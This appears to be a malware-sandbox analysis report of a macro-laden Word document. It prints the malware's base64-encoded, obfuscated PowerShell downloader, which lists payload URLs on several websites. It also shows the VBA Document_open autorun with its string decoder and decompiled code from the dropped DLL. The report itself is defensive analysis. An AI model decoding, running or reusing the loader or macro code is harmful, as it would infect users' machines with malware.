IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAn

                      H1kcw0gko9w6ta3y

                      StringsDecrypted Strings
                      "w]xm[v"
                      LineInstructionMeta Information
                      230

                      Function Cws3jiyt47ovpsrhug(Mhb7dz_hsybhf0ic7)

                      231

                      Cws3jiyt47ovpsrhug = Replace(Mhb7dz_hsybhf0ic7, "w]xm[v", H1kcw0gko9w6ta3y)

                      Replace("ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[vw]xm[vw]xm[vsw]xm[vw]xm[vw]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[vw]xm[vpw]xm[vw]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v","w]xm[v",) -> winmgmts:win32_process

                      H1kcw0gko9w6ta3y

                      executed
                      232

                      End Function

                      Module: Kyl0l3rqw280c6ssa

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Kyl0l3rqw280c6ssa"

                      2

                      Attribute VB_Base = "1Normal.ThisDocument"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = True

                      8

                      Attribute VB_Customizable = True

                      Executed Functions
                      Subroutine Document_open, APIs: 86, Strings: 0, Number of lines: 3, Relevance: 130.503
                      APIsMeta Information

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Xaem5y61ivq

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Hj9iyfe3bvb

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: StoryRanges

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: wdMainTextStory

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Xrsb1iydy1_t2h

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: ykgfGkNf

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: BzbdEl

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: BzbdEl

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: mZXJjJAgq

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: JfXdCsEp

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: JfXdCsEp

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: MSsFhG

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: DJlZDCM

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: DJlZDCM

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: VDhTuRJ

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: QWDldHHR

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: QWDldHHR

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Mid

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Name

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Application

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: FBkjB

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: reejhCJo

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: reejhCJo

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: ICwOHad

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: PNjoAGP

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: PNjoAGP

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: GlHkEN

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: shylMG

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: shylMG

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: CreateObject

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: nDpnHa

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: neULB

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: neULB

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: SgwfJAm

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: aDUvJDOI

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: aDUvJDOI

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: GqPOTjZ

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: xSGbCJ

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: xSGbCJ

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Create

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Mid

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Len

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Vc1971csmq7a5g9

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: W7x42qfm4_lw

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: dUNUgHJG

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: kshfoytP

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: kshfoytP

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: SetWuCGdA

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: ZYHZlIii

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: ZYHZlIii

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      Part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b: Fix

                      LineInstructionMeta Information
                      9

                      Private Sub Document_open()

                      10

                      Bn2p1rxokklh_9o8

                      executed
                      11

                      End Sub

                      Module: P0_myy5fnenf

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "P0_myy5fnenf"

                      Reset < >

                        Analysis Process: powershell.exe PID: 2552 Parent PID: 1100 powershell.exeCOMMON

                        Executed Functions

                        Function 000007FF00272E05, Relevance: .5, Instructions: 483COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64e3dd6d9a0bc953f5368c61396ad13fbb4d2c6c2142fff538e2c445a345eee7
                        • Instruction ID: e516825b5104771ff4c923765d245b995fb3698d802ac58308c7bfaa634b3936
                        • Opcode Fuzzy Hash: 64e3dd6d9a0bc953f5368c61396ad13fbb4d2c6c2142fff538e2c445a345eee7
                        • Instruction Fuzzy Hash: 11B1112151E7D28FD75387789C696A13FB0AF57210B0A01EBD488CF0B3D6595E9AC3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 000007FF00270781, Relevance: .2, Instructions: 178COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5d18cb070a7fb38f1667df6698750856447298eea527e7e7bfabd3235712e5d4
                        • Instruction ID: 65c7505882b65539fcd6537376b622dc72464a151dca83072dbc2b039165c6b8
                        • Opcode Fuzzy Hash: 5d18cb070a7fb38f1667df6698750856447298eea527e7e7bfabd3235712e5d4
                        • Instruction Fuzzy Hash: 4731226194E7D24FD70387385C656A03FB0AF17210B0A05E7D088CF0F3D9599E9AC3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 000007FF00272629, Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a53b4833ab36b37f7ee18f243b27d5993a0bda0363faaae08db45f43d8016288
                        • Instruction ID: 907f84791dc90babc7d170cc6992bd1b0f534e2234cacbb8dc3d35ed3c757742
                        • Opcode Fuzzy Hash: a53b4833ab36b37f7ee18f243b27d5993a0bda0363faaae08db45f43d8016288
                        • Instruction Fuzzy Hash: AC21CD6295E7D24FD70353746C6A2E17FA0AF57254F0E42E7D484CE0A3E64A0A9AC363
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 000007FF002726C1, Relevance: .1, Instructions: 85COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e4abfb733bdfb14a344b89e87ff55ba5796e4f5ed37f27791f945f0c713c9e8
                        • Instruction ID: c63fa5e5658b82f7fd208ed7cd54b92f7341445b08803b01bfd70ef7609ed166
                        • Opcode Fuzzy Hash: 3e4abfb733bdfb14a344b89e87ff55ba5796e4f5ed37f27791f945f0c713c9e8
                        • Instruction Fuzzy Hash: 1B01E56195E7D24FD30353746D2A2D47FB0AF53254F0E41E7D485CF0A3E64A0A9AC362
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 2760 Parent PID: 2332 rundll32.exeCOMMON

                        Executed Functions

                        Function 10002A7E, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E10002A7E(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t30;
				intOrPtr* _t36;
				void* _t37;
				signed int _t39;

				E1001DA49(_t30);
				_v20 = 0x467731;
				_v16 = 0;
				_v12 = 0x472a;
				_v12 = _v12 + 0xffff7b40;
				_v12 = _v12 + 0xffffef38;
				_v12 = _v12 ^ 0xffffe9c4;
				_v8 = 0x3c5a;
				_t39 = 0x79;
				_v8 = _v8 / _t39;
				_v8 = _v8 + 0xe4e9;
				_v8 = _v8 ^ 0x0000c838;
				_t36 = E10005C61(0x7bb52d4d, 0x202, 0xfe955d23);
				_t37 =  *_t36(0, _a16, 0, 0, _a4, __ecx, 0, _a4, 0, _a12, _a16, _a20, _a24, 0); // executed
				return _t37;
			}











                        0x10002a9a
                        0x10002a9f
                        0x10002aa8
                        0x10002aab
                        0x10002ab2
                        0x10002ab9
                        0x10002ac0
                        0x10002ac7
                        0x10002ad3
                        0x10002ade
                        0x10002ae1
                        0x10002ae8
                        0x10002aff
                        0x10002b10
                        0x10002b16

                        APIs
                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,FFFFE9C4,?,?,?,?,?,?,?,?,?,00000000), ref: 10002B10
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: FolderPath
                        • String ID: *G$1wF$Z<
                        • API String ID: 1514166925-2208826043
                        • Opcode ID: 54bbc501c4f77dbf5ec68676d9fbf33ac628e155891657d84bac3197445bb72e
                        • Instruction ID: 4dfd91e235e978a8a621c6a64ff8a08886502bdd2d81794e7770737d8ae05b32
                        • Opcode Fuzzy Hash: 54bbc501c4f77dbf5ec68676d9fbf33ac628e155891657d84bac3197445bb72e
                        • Instruction Fuzzy Hash: 72115776801218FBDF10DFE5D8098CEBFB5EF05360F108189B908662A0D3754B61DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0019E530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 00000007.00000002.2088409630.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001DA4A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E1001DA4A(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a16, long _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				void* _t32;
				void* _t37;
				WCHAR* _t45;

				_push(__ecx);
				_push(__ecx);
				_t45 = __ecx;
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E1001DA49(_t32);
				_v8 = 0xa30a;
				_v8 = _v8 + 0xe546;
				_v8 = _v8 << 6;
				_v8 = _v8 | 0xbe0b0289;
				_v8 = _v8 ^ 0xbe6b5086;
				_v12 = 0x62;
				_v12 = _v12 | 0x3cb13658;
				_v12 = _v12 + 0xffff4721;
				_v12 = _v12 ^ 0x3cb076f0;
				E10005C61(0xd9ce7b11, 0xd7, 0xbc6fde34);
				_t37 = CreateFileW(_t45, _a24, _a32, 0, _a16, _a28, 0); // executed
				return _t37;
			}








                        0x1001da4d
                        0x1001da4e
                        0x1001da53
                        0x1001da55
                        0x1001da56
                        0x1001da59
                        0x1001da5c
                        0x1001da5f
                        0x1001da62
                        0x1001da65
                        0x1001da66
                        0x1001da69
                        0x1001da6c
                        0x1001da6f
                        0x1001da73
                        0x1001da74
                        0x1001da79
                        0x1001da83
                        0x1001da8f
                        0x1001da93
                        0x1001da9a
                        0x1001daa1
                        0x1001daa8
                        0x1001daaf
                        0x1001dab6
                        0x1001dacd
                        0x1001dae4
                        0x1001daeb

                        APIs
                        • CreateFileW.KERNEL32(?,?,?,00000000,339DF2AD,B78798A3,00000000), ref: 1001DAE4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: CreateFile
                        • String ID: F$b
                        • API String ID: 823142352-411355777
                        • Opcode ID: 69fdc3fa9d72879a0da2db329fddd41aeb27e9de262caeebf668ecc3c02f5a9d
                        • Instruction ID: 8bab848c21193ffcdcbde572ca9f4c1c5807ab98bdb15a7aa53bb8d743ad64b8
                        • Opcode Fuzzy Hash: 69fdc3fa9d72879a0da2db329fddd41aeb27e9de262caeebf668ecc3c02f5a9d
                        • Instruction Fuzzy Hash: 3B110676901248FFDF018FD5DD0ACDE7F7AEF99314F158149FA0462120D3729A20ABA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10010F67, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44serviceCOMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E10010F67(int __ecx, short* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t26;
				void* _t33;
				signed int _t35;
				short* _t40;
				int _t41;

				_push(_a12);
				_t40 = __edx;
				_t41 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E1001DA49(_t26);
				_v16 = _v16 & 0x00000000;
				_v20 = 0x268f0d;
				_v8 = 0x1cc0;
				_t35 = 0x11;
				_v8 = _v8 / _t35;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00002b78;
				_v12 = 0xdacd;
				_v12 = _v12 | 0x08707abe;
				_v12 = _v12 ^ 0x0870d1a0;
				E10005C61(0x39413f62, 0x12a, 0x131a05a);
				_t33 = OpenServiceW(_a8, _t40, _t41); // executed
				return _t33;
			}












                        0x10010f6f
                        0x10010f72
                        0x10010f74
                        0x10010f76
                        0x10010f79
                        0x10010f7c
                        0x10010f7d
                        0x10010f7e
                        0x10010f83
                        0x10010f89
                        0x10010f90
                        0x10010f9c
                        0x10010fa7
                        0x10010faa
                        0x10010fae
                        0x10010fb5
                        0x10010fbc
                        0x10010fc3
                        0x10010fda
                        0x10010fe7
                        0x10010fee

                        APIs
                        • OpenServiceW.SECHOST(00000000,?,?,?,?,?,?,?), ref: 10010FE7
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: OpenService
                        • String ID: b?A9$x+
                        • API String ID: 3098006287-3905361306
                        • Opcode ID: 5f25cdf5d72b9b157b1059a85f46f184f73fa6c1f9a94df05cdee3caed3e677b
                        • Instruction ID: 5e482b72b9fc1ef4f9dd550b6852b916541166715e4a37c12d879e622bc05068
                        • Opcode Fuzzy Hash: 5f25cdf5d72b9b157b1059a85f46f184f73fa6c1f9a94df05cdee3caed3e677b
                        • Instruction Fuzzy Hash: 8A017C75900208FBEB14EFD9CC0A8CEBFB5EF85315F108099F91867290D7B55B64ABA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10016540, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON
                        Download Yara Rule
                        C-Code - Quality: 36%
                        			E10016540(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t27;
				intOrPtr* _t34;
				void* _t35;
				signed int _t36;
				void* _t42;

				_t42 = __edx;
				E1001DA49(_t27);
				_v28 = 0x620f5e;
				asm("stosd");
				_t36 = 0x6c;
				asm("stosd");
				asm("stosd");
				_v12 = 0x133f;
				_v12 = _v12 / _t36;
				_v12 = _v12 ^ 0x00001151;
				_v8 = 0x7686;
				_v8 = _v8 << 4;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0003dd25;
				_t34 = E10005C61(0x245757e3, 0x1e7, 0xbc6fde34);
				_t35 =  *_t34(_t42, 0, _a4, 0x28, 0, __edx, _a4, _a8, 0x28, _a16, _a20, _a24); // executed
				return _t35;
			}












                        0x1001654b
                        0x1001655e
                        0x10016563
                        0x10016571
                        0x10016574
                        0x10016578
                        0x1001657e
                        0x1001657f
                        0x10016590
                        0x10016598
                        0x1001659f
                        0x100165a6
                        0x100165aa
                        0x100165ad
                        0x100165ba
                        0x100165ca
                        0x100165d1

                        APIs
                        • SetFileInformationByHandle.KERNELBASE(?,00000000,00001151,00000028,?,?,?,?,?,?,?,?), ref: 100165CA
                        Strings
